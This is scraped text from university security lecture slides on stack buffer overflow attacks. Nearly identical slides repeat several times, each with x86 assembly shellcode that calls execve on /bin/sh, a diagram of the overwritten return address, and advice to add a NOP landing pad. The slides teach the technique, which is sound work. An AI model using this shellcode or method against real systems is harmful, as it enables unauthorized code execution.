Running Evil Code… 62 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’

Running Evil Code… 63 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’

Running Evil Code… 64 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop

Running Evil Code… 65 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop

Running Evil Code… 66 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop

Running Evil Code… 67 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.